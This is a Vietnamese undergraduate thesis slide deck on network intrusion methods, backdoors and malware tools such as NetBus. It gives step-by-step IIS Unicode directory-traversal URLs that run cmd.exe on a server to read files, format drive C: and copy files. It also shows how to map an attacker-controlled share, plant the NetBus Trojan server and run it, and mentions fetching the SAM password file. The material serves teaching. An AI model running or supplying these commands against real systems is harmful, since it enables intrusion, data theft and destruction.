1. Trang chủ
  2. » Thể loại khác

Vu Thi Thu Hang_CT702 pps

27 303 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 27
Dung lượng 239 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

NỘI DUNG CHÍNH Chương 1: MỘT SỐ PHƯƠNG PHÁP TẤN CÔNG VÀ KỸ THUẬT XÂM NHẬP MẠNG Chương 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG TRÊN MẠNG Chương 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM... Thực trạng tấn cô

Trang 1

BÁO CÁO ĐỒ ÁN

NGÀNH CÔNG NGHỆ THÔNG TIN

Đề tài:

TÌM HIỂU MỘT SỐ PHẦN MỀM PHÁ HOẠI &

CÁC GIẢI PHÁP XÂM NHẬP MẠNG DÙNG RIÊNG

CÓ KẾT NỐI INTERNET

Giáo viên hướng dẫn: TS Hồ Văn Canh Sinh viên : Vũ Thị Thu Hằng Lớp : CT702

BỘ GIÁO DỤC VÀ ĐÀO TẠO

TRƯỜNG ĐH DLHP

Trang 2

NỘI DUNG CHÍNH

Chương 1: MỘT SỐ PHƯƠNG PHÁP TẤN CÔNG

VÀ KỸ THUẬT XÂM NHẬP MẠNG Chương 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG

TRÊN MẠNG Chương 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM

Trang 4

Thực trạng tấn công của tội phạm trên mạng

 Phần lớn các cuộc tấn công trên mạng được thực hiện thông qua việc sử dụng một hoặc nhiều công cụ phần mềm

Trang 5

Các phương pháp tấn công

 Tấn công trực tiếp

 Nghe trộm

 Giả mạo địa chỉ

 Vô hiệu hoá các chức năng của hệ thống mục tiêu

 Sử dụng lỗi của người quản trị hệ thống

Trang 7

Chương 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG

TRÊN MẠNG

 Phát hiện điểm yếu trong cơ chế bảo mật của đối phương

 Triệt để lợi dụng cửa sau để tấn công

 Tận dụng các công cụ sẵn có

 Khai thác tối đa điểm yếu của mục tiêu tấn công,

đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ

 Nguyên tắc an toàn

 Nguyên tắc phối hợp tấn công

Trang 8

Phát hiện điểm yếu trong cơ chế bảo mật

của đối phương

 Một hệ thống đảm bảo ANAT máy tính gồm :

 Yếu tố tổ chức.

 Yếu tố kỹ thuật, công nghệ.

 Có hai hướng tiếp cận để tìm các lỗ hổng bảo mật:

Trang 9

Triệt để lợi dụng cửa sau để tấn công

 Việc đột nhập vào một hệ thống máy tính nào đó nói chung là rất khó khăn, vì thế sau khi đột nhập người ta muốn để lại một công cụ nào đó giúp dễ dàng xâm nhập trong những lần sau

 Backdoor / Trojan.

 Nguyên tắc hoạt động của Backdoor

Máy tấn công

Máy đích

Giao tiếp bình thường

Giao tiếp cửa sau

Hình 3.1.1:Mô hình hoạt động của backdoor

Trang 11

Value data C:\windows\patch.exe

Trang 12

Khai thác tối đa điểm yếu của mục tiêu tấn công,

đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ

 Phương pháp tấn công IIS server bằng cách lợi dụng lỗi Unicode “dot dot directory traversal attack” (tấn công bằng cách lần ngược thư mục do lỗi “dot dot”)

 http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+dir+c:\

 Thay xâu con “ /”, “ \” bởi xâu unicode chứa một đoạn mã hóa rất dài của ký tự “/” “\” như “%c1%1c”,

“ c0%f9”…

Trang 13

Khai thác tối đa điểm yếu của mục tiêu tấn công,

đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ

 Khi thực thi, xâu “%c1%1c” được dịch trở lại nguyên dạng ký tự “/”.

http://www.iisaffected.com/scripts/ / /winnt/system32/cmd.exe?/c+dir+c:\

 Để xem nội dung file autoexec.bat:

http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+type+c:\autoexec bat

 Để format lại ổ đĩa C:

http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+format+c:\+/q

Trang 14

Khai thác tối đa điểm yếu của mục tiêu tấn công,

đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ

 Cũng có thể chiếm quyền ghi đĩa và thực hiện sửa đổi, tạo mới file trên server:

+ Bước 1: Tạo một bản sao mới cmd1.exe của trình thông dịch lệnh DOS:

http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+copy+c:\winnt/system32/cmd.exe+c/

winnt/system32/cmd1.exe

+ Bước 2: Ghi thêm một số lệnh vào file autoexec.bat: http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+echo+>>+c:\autoexec.bat+@echo+Hihi

Trang 15

Hình 3.5.1: Mô hình giao tiếp giữa hai máy thông qua proxy.

phương Gửi yêu cầu

Trả lời

Gửi yêu cầu

Trả lời

Trang 16

Nguyên tắc phối hợp tấn công

Khám phá điểm yếu, lỗ hổng bảo mật trong hệ thống mục tiêu

Sử dụng các công cụ để khai thác các điểm yếu của hệ thống mục tiêu

Tiến hành các biện pháp tấn công,

thu thập thông tin

Tạo đường ngầm (cửa sau), cài cắm “điệp viên” nếu có thể

Xóa dấu vết Ngụy trang

Hình 3.6.1: Sơ đồ thứ tự áp dụng các nguyên lý tấn công

Trang 17

Chương 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU

 NETBUS

Trang 18

WS_Ping ProPack (http://www.ipswitch.com)

Chương 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU

Trang 19

Chương 4: MỘT SỐ GIẢI PHÁP CỤ THỂ

TẤN CÔNG TRÊN MẠNG MÁY TÍNH

 Tấn công máy mục tiêu bằng cách giành quyền điều khiển hệ thống đó

HTTP (HypeTtext Transfer Protocol – giao thức

truyền siêu văn bản)

Giao thức TFTP (Trivial File Transfer Protocol –

giao thức truyền file đơn giản)

Giao thức NetBIOS (Network Basic Input/Output

System)

 Kết hợp công cụ quét tài nguyên được chia sẻ và công cụ bẻ mật khẩu

Trang 20

Cách download và upload file trên IIS

mắc lỗi Unicode

 Khi cài IIS phiên bản từ 4.0 trở lên, FTP server cho phép user truy cập vào thư mục \inetpub\ftoproot\ và download các file từ đó:

+ Bước 1: Copy file download (giả sử là file c:\system.ini) vào thư mục \inetpub\ftoproot\ bằng URL:

http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+copy+c:\system.ini+c:\inetpub\ftoproot\

+ Bước 2: Sử dụng FTP vô danh đăng nhập vào máy tính đích download file system.ini về

Trang 21

 Windows NT và Windows 2000 lưu trữ một

bản sao file SAM (Security Account Manager)

trong thư mục \WINNT\repair\, lưu trữ thông tin

về account sử dụng hệ thống đã được mã hóa

Trang 22

Cách download và upload file trên IIS

mắc lỗi Unicode

 Bước 1: Chia sẻ một ổ đĩa trên máy của mình, ổ C: , với quyền truy nhập là “Full” và không có pass bảo vệ.Tên

chia sẻ (Share name) được đặt là “My Disk”

Bước 2: Sử dụng lệnh “net use” trên IIS để ánh xạ (map)

“My Disk” (tức là ổ đĩa C: trên máy của mình) về thành

một ổ đĩa mới trên máy chủ phía đích, ổ G:

http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+net +use+G:+\\203.160.1.94\MyDisk

Trang 23

trình duyệt copy lên đĩa cứng thực sự của server

Trên ổ C: của người ta có Trojan netbus 1.7 với thành phần server là Patch.exe, người ta sẽ thực hiện lệnh sau ở trình duyệt: http://www.iisaffected.com/scripts/

%c1%1c /winnt/system32/cmd.exe?/c+copy+g:\

Patch.exe+c:\Patch.exe

Trang 24

Cách download và upload file trên IIS

mắc lỗi Unicode

 Bước 4: Dùng lệnh “net use G:/delete” trên server để

http://www.iisaffected.com/scripts/ %c1%1c /winnt/system32/cmd.exe?/c+net+use+g:+\delete

Bỏ việc “share” ổ đĩa C: để đảm bảo an toàn

 Bước 5: Chạy thành phần server của chương trình điều khiển từ xa trên máy đích thành phần client trên máy của

ta, kết nối vào và điều khiển máy đích

Trang 25

Kết hợp công cụ quét tài nguyên được

chia sẻ và công cụ bẻ mật khẩu

 Để quét tài nguyên được chia sẻ trên máy mục tiêu, dùng phần mềm WS_Ping ProPack với công cụ Scan

 Để truy cập đến tài nguyên đó:

Run\\<địa chỉ IP>\<tên tài nguyên>

câu lệnh C:\net view <địa chỉ IP>

 Nếu tài nguyên được chia sẻ không có mật khẩu thì

truy nhập : net use <ổ đĩa bất kỳ trên máy của bạn > :

<ổ share của nạn nhân >

Trang 26

Kết hợp công cụ quét tài nguyên được chia

Trang 27

KẾT LUẬN

vấn để vô cùng rộng, thời gian ngắn và trình độ có hạn nên

đồ án còn nhiều hạn chế và chưa giải quyết trọn vẹn yêu cầu đề tài nêu ra

chế để đề tài ngày càng hoàn thiện hơn và tạo ra sản phẩm phần mềm - công cụ ứng dụng trong công nghệ xâm nhập

Em xin chân thành cảm ơn !

Ngày đăng: 28/07/2014, 03:20

HÌNH ẢNH LIÊN QUAN

Hình 3.1.1:Mô hình hoạt động của backdoor - Vu Thi Thu Hang_CT702 pps
Hình 3.1.1 Mô hình hoạt động của backdoor (Trang 9)
Hình 3.5.1: Mô hình giao tiếp giữa hai máy thông qua proxy. - Vu Thi Thu Hang_CT702 pps
Hình 3.5.1 Mô hình giao tiếp giữa hai máy thông qua proxy (Trang 15)
Hình 3.6.1: Sơ đồ thứ tự áp dụng các nguyên lý tấn công - Vu Thi Thu Hang_CT702 pps
Hình 3.6.1 Sơ đồ thứ tự áp dụng các nguyên lý tấn công (Trang 16)

TỪ KHÓA LIÊN QUAN

w